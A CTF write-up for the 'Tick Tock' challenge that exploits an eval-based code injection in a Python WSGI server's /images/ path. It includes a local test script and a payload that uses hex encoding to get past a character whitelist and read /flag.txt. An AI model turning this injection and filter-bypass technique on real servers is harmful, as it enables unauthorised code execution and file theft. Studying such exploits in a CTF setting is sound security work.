Remote code execution by injecting python code into a Python WSGI server.
Tick Tock hints: flag in /flag.txt Possibly my favourite challenge from the CTF. It's a very simple website running on a Python WSGI Server backend. It has a code injection vulnerability in its time feature.
The landing page looks like this:
Interesting regex, might be useful later. When trying to access robots.txt or some random page, we receive the following 404:
Interesting image of the time now. Also, let’s take a look at the source:
<h1>Not Found</h1> <img src="/images/now"/>
Looking at the source and the output, we can see that
http://18.104.22.168:8081/images/now gives you the current time dynamically. It
also looks very very suspiciously similar to the output of
I guessed the following was happening when we pass in our URL:
eval("str(datetime.datetime.%s())" % hack)
where hack is the /image//. Now looking back at the index page, we can guess that the regex there are the acceptable characters for this path.
So I wrote the following script to develop my exploit:
import datetime import re import sys def test_hack(hack): good = re.compile("[0-9 a-z A-Z / \" \+ , ( ) . # \[ \] =]+") assert good.match(hack), "There are invalid characters in your payload" return eval("str(datetime.datetime.%s())" % hack) def main(): payload = sys.argv print test_hack(payload) if __name__ == "__main__": main()
Testing my exploit locally:
[email protected]$ python testhack.py 'now().ctime()+"["+file("2f666c61672e747874".decode("hex")).read()+"]".upper' M[cool long ass flag thing lol]
Attacking the remote server through the URL:
Take a closer look at the generated image:
It contains our flag :D